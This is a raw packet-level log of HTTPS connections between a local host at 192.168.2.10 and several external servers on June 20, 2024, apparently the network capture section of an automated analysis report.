Jun 20, 2024 18:14:11.492413044 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.492435932 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.492443085 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.492456913 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.492465973 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.492544889 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.492548943 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.493099928 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.493138075 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.493165016 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.493172884 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.493182898 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.493436098 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.493469954 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.493494987 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.493504047 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.493522882 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.493674994 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.493695021 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.494165897 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.494165897 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.508240938 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:11.508472919 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:11.508517981 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:11.509809017 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:11.510021925 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:11.511379004 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:11.511499882 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:11.512701035 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:11.532500982 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.556524992 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:11.660134077 CEST	49712	443	192.168.2.10	2.16.164.82
Jun 20, 2024 18:14:11.660151005 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.660265923 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:11.660285950 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:11.801251888 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.801280022 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.801302910 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.801317930 CEST	49712	443	192.168.2.10	2.16.164.82
Jun 20, 2024 18:14:11.801345110 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.801362038 CEST	49712	443	192.168.2.10	2.16.164.82
Jun 20, 2024 18:14:11.801367044 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.801392078 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.801412106 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.801415920 CEST	49712	443	192.168.2.10	2.16.164.82
Jun 20, 2024 18:14:11.801440001 CEST	49712	443	192.168.2.10	2.16.164.82
Jun 20, 2024 18:14:11.801440001 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.801459074 CEST	49712	443	192.168.2.10	2.16.164.82
Jun 20, 2024 18:14:11.815788031 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:11.815819025 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.815841913 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.862140894 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.862157106 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.862174988 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.862184048 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.862193108 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.862225056 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.862246037 CEST	49712	443	192.168.2.10	2.16.164.82
Jun 20, 2024 18:14:11.862271070 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.862296104 CEST	49712	443	192.168.2.10	2.16.164.82
Jun 20, 2024 18:14:11.862320900 CEST	49712	443	192.168.2.10	2.16.164.82
Jun 20, 2024 18:14:11.869949102 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.869959116 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.869976044 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.869991064 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.870014906 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.870023012 CEST	49712	443	192.168.2.10	2.16.164.82
Jun 20, 2024 18:14:11.870029926 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.870060921 CEST	49712	443	192.168.2.10	2.16.164.82
Jun 20, 2024 18:14:11.870091915 CEST	49712	443	192.168.2.10	2.16.164.82
Jun 20, 2024 18:14:11.887785912 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.938883066 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:11.938910007 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:11.938920975 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:11.939002991 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:11.939049959 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:11.939049959 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:11.939096928 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:11.939130068 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:11.946542978 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.946561098 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.946585894 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.946594954 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.946616888 CEST	49712	443	192.168.2.10	2.16.164.82
Jun 20, 2024 18:14:11.946631908 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.946679115 CEST	49712	443	192.168.2.10	2.16.164.82
Jun 20, 2024 18:14:11.946687937 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.946731091 CEST	49712	443	192.168.2.10	2.16.164.82
Jun 20, 2024 18:14:11.960802078 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.960825920 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.960850954 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.960865021 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.960874081 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.960890055 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.960891008 CEST	49712	443	192.168.2.10	2.16.164.82
Jun 20, 2024 18:14:11.960942984 CEST	49712	443	192.168.2.10	2.16.164.82
Jun 20, 2024 18:14:11.960953951 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.961007118 CEST	49712	443	192.168.2.10	2.16.164.82
Jun 20, 2024 18:14:11.962014914 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.962044954 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.962088108 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.962126970 CEST	49712	443	192.168.2.10	2.16.164.82
Jun 20, 2024 18:14:11.962132931 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.962141037 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.962156057 CEST	49712	443	192.168.2.10	2.16.164.82
Jun 20, 2024 18:14:11.962196112 CEST	49712	443	192.168.2.10	2.16.164.82
Jun 20, 2024 18:14:11.962213993 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.975220919 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.975239992 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.975300074 CEST	49712	443	192.168.2.10	2.16.164.82
Jun 20, 2024 18:14:11.975317955 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.975358963 CEST	49712	443	192.168.2.10	2.16.164.82
Jun 20, 2024 18:14:11.975361109 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.975408077 CEST	49712	443	192.168.2.10	2.16.164.82
Jun 20, 2024 18:14:11.975795984 CEST	49712	443	192.168.2.10	2.16.164.82
Jun 20, 2024 18:14:11.975812912 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.979701996 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.104888916 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.104898930 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.104928017 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.104945898 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.105010033 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.105889082 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.105900049 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.105916023 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.105932951 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.105967045 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.106678009 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.106687069 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.106703997 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.106719971 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.106755018 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.152359962 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.152374029 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.152452946 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.152539968 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.152539968 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.261847973 CEST	49671	443	192.168.2.10	204.79.197.203
Jun 20, 2024 18:14:12.272903919 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.272917032 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.272978067 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.273000956 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.273045063 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.274315119 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.274322987 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.274379969 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.275624990 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.275633097 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.275691032 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.277326107 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.277333021 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.277379036 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.278506994 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.278513908 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.278569937 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.279547930 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.279614925 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.320130110 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.320276976 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.320566893 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.320627928 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.440689087 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.440849066 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.442739010 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.442823887 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.443116903 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.443177938 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.446566105 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.446676970 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.448021889 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.448093891 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.449922085 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.450001955 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.450134039 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.450187922 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.450988054 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.451051950 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.457937956 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.458018064 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.458838940 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.458918095 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.459696054 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.459753990 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.460738897 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.460803032 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.487315893 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.487437010 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.487974882 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.488042116 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.489554882 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.489645004 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.537132025 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.537245035 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.607933998 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.608010054 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.608678102 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.608736992 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.609683990 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.609746933 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.611556053 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.611624002 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.611882925 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.611943007 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.612504005 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.612565994 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.613528013 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.613615990 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.614424944 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.614486933 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.616018057 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.616108894 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.617458105 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.617539883 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.617759943 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.617775917 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.617814064 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.618737936 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.618791103 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.619627953 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.619687080 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.620248079 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.620302916 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.621380091 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.621440887 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.624279976 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.624373913 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.625132084 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.625183105 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.695736885 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.695812941 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.696918964 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.696985960 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.707051039 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.707128048 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.707830906 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.707866907 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.707890987 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.707909107 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.707926035 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.707950115 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:12.707989931 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.708225012 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:12.708241940 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:13.012995005 CEST	49716	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:13.013041019 CEST	443	49716	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:13.013120890 CEST	49716	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:13.014667988 CEST	49716	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:13.014688015 CEST	443	49716	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:13.023094893 CEST	49717	443	192.168.2.10	18.239.36.50
Jun 20, 2024 18:14:13.023123980 CEST	443	49717	18.239.36.50	192.168.2.10
Jun 20, 2024 18:14:13.023278952 CEST	49717	443	192.168.2.10	18.239.36.50
Jun 20, 2024 18:14:13.023674011 CEST	49717	443	192.168.2.10	18.239.36.50
Jun 20, 2024 18:14:13.023699999 CEST	443	49717	18.239.36.50	192.168.2.10
Jun 20, 2024 18:14:13.735367060 CEST	443	49717	18.239.36.50	192.168.2.10
Jun 20, 2024 18:14:13.778847933 CEST	49717	443	192.168.2.10	18.239.36.50
Jun 20, 2024 18:14:13.804651022 CEST	49717	443	192.168.2.10	18.239.36.50
Jun 20, 2024 18:14:13.804665089 CEST	443	49717	18.239.36.50	192.168.2.10
Jun 20, 2024 18:14:13.808844090 CEST	443	49717	18.239.36.50	192.168.2.10
Jun 20, 2024 18:14:13.808917046 CEST	49717	443	192.168.2.10	18.239.36.50
Jun 20, 2024 18:14:13.811234951 CEST	49717	443	192.168.2.10	18.239.36.50
Jun 20, 2024 18:14:13.811343908 CEST	443	49717	18.239.36.50	192.168.2.10
Jun 20, 2024 18:14:13.811997890 CEST	49717	443	192.168.2.10	18.239.36.50
Jun 20, 2024 18:14:13.812007904 CEST	443	49717	18.239.36.50	192.168.2.10
Jun 20, 2024 18:14:13.855303049 CEST	49717	443	192.168.2.10	18.239.36.50
Jun 20, 2024 18:14:13.900007010 CEST	443	49716	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:13.901000023 CEST	49716	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:13.901076078 CEST	443	49716	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:13.904720068 CEST	443	49716	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:13.904803991 CEST	49716	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:13.905669928 CEST	49716	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:13.905849934 CEST	443	49716	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:13.906238079 CEST	49716	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:13.906256914 CEST	443	49716	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:13.947675943 CEST	49716	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:14.141619921 CEST	443	49717	18.239.36.50	192.168.2.10
Jun 20, 2024 18:14:14.141705036 CEST	443	49717	18.239.36.50	192.168.2.10
Jun 20, 2024 18:14:14.141748905 CEST	49717	443	192.168.2.10	18.239.36.50
Jun 20, 2024 18:14:14.145998955 CEST	49717	443	192.168.2.10	18.239.36.50
Jun 20, 2024 18:14:14.146019936 CEST	443	49717	18.239.36.50	192.168.2.10
Jun 20, 2024 18:14:14.166683912 CEST	49721	443	192.168.2.10	18.239.36.50
Jun 20, 2024 18:14:14.166717052 CEST	443	49721	18.239.36.50	192.168.2.10
Jun 20, 2024 18:14:14.166774035 CEST	49721	443	192.168.2.10	18.239.36.50
Jun 20, 2024 18:14:14.167978048 CEST	49721	443	192.168.2.10	18.239.36.50
Jun 20, 2024 18:14:14.167989016 CEST	443	49721	18.239.36.50	192.168.2.10
Jun 20, 2024 18:14:14.766875982 CEST	443	49716	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:14.769484043 CEST	49722	443	192.168.2.10	142.250.185.132
Jun 20, 2024 18:14:14.769526958 CEST	443	49722	142.250.185.132	192.168.2.10
Jun 20, 2024 18:14:14.769675970 CEST	49722	443	192.168.2.10	142.250.185.132
Jun 20, 2024 18:14:14.770350933 CEST	49722	443	192.168.2.10	142.250.185.132
Jun 20, 2024 18:14:14.770370007 CEST	443	49722	142.250.185.132	192.168.2.10
Jun 20, 2024 18:14:14.780105114 CEST	443	49716	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:14.780658960 CEST	49716	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:14.789846897 CEST	49716	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:14.789896965 CEST	443	49716	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:14.835478067 CEST	49723	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:14.835537910 CEST	443	49723	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:14.835618019 CEST	49723	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:14.836585045 CEST	49723	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:14.836599112 CEST	443	49723	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:14.873995066 CEST	443	49721	18.239.36.50	192.168.2.10
Jun 20, 2024 18:14:14.876313925 CEST	49721	443	192.168.2.10	18.239.36.50
Jun 20, 2024 18:14:14.876334906 CEST	443	49721	18.239.36.50	192.168.2.10
Jun 20, 2024 18:14:14.877388954 CEST	443	49721	18.239.36.50	192.168.2.10
Jun 20, 2024 18:14:14.877470016 CEST	49721	443	192.168.2.10	18.239.36.50
Jun 20, 2024 18:14:14.878726959 CEST	49721	443	192.168.2.10	18.239.36.50
Jun 20, 2024 18:14:14.878789902 CEST	443	49721	18.239.36.50	192.168.2.10
Jun 20, 2024 18:14:14.879412889 CEST	49721	443	192.168.2.10	18.239.36.50
Jun 20, 2024 18:14:14.879420996 CEST	443	49721	18.239.36.50	192.168.2.10
Jun 20, 2024 18:14:14.933455944 CEST	49721	443	192.168.2.10	18.239.36.50
Jun 20, 2024 18:14:15.123522043 CEST	49675	443	192.168.2.10	173.222.162.55
Jun 20, 2024 18:14:15.123573065 CEST	49674	443	192.168.2.10	173.222.162.55
Jun 20, 2024 18:14:15.135055065 CEST	443	49721	18.239.36.50	192.168.2.10
Jun 20, 2024 18:14:15.135134935 CEST	443	49721	18.239.36.50	192.168.2.10
Jun 20, 2024 18:14:15.135288000 CEST	49721	443	192.168.2.10	18.239.36.50
Jun 20, 2024 18:14:15.159534931 CEST	49721	443	192.168.2.10	18.239.36.50
Jun 20, 2024 18:14:15.159555912 CEST	443	49721	18.239.36.50	192.168.2.10
Jun 20, 2024 18:14:15.418060064 CEST	443	49722	142.250.185.132	192.168.2.10
Jun 20, 2024 18:14:15.418467999 CEST	49722	443	192.168.2.10	142.250.185.132
Jun 20, 2024 18:14:15.418484926 CEST	443	49722	142.250.185.132	192.168.2.10
Jun 20, 2024 18:14:15.419900894 CEST	443	49722	142.250.185.132	192.168.2.10
Jun 20, 2024 18:14:15.419954062 CEST	49722	443	192.168.2.10	142.250.185.132
Jun 20, 2024 18:14:15.421853065 CEST	49722	443	192.168.2.10	142.250.185.132
Jun 20, 2024 18:14:15.421953917 CEST	443	49722	142.250.185.132	192.168.2.10
Jun 20, 2024 18:14:15.478944063 CEST	49722	443	192.168.2.10	142.250.185.132
Jun 20, 2024 18:14:15.478966951 CEST	443	49722	142.250.185.132	192.168.2.10
Jun 20, 2024 18:14:15.528539896 CEST	49722	443	192.168.2.10	142.250.185.132
Jun 20, 2024 18:14:15.595123053 CEST	49724	443	192.168.2.10	184.28.90.27
Jun 20, 2024 18:14:15.595166922 CEST	443	49724	184.28.90.27	192.168.2.10
Jun 20, 2024 18:14:15.595561981 CEST	49724	443	192.168.2.10	184.28.90.27
Jun 20, 2024 18:14:15.597949982 CEST	49724	443	192.168.2.10	184.28.90.27
Jun 20, 2024 18:14:15.597961903 CEST	443	49724	184.28.90.27	192.168.2.10
Jun 20, 2024 18:14:15.719168901 CEST	443	49723	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:15.722204924 CEST	49723	443	192.168.2.10	38.34.185.163
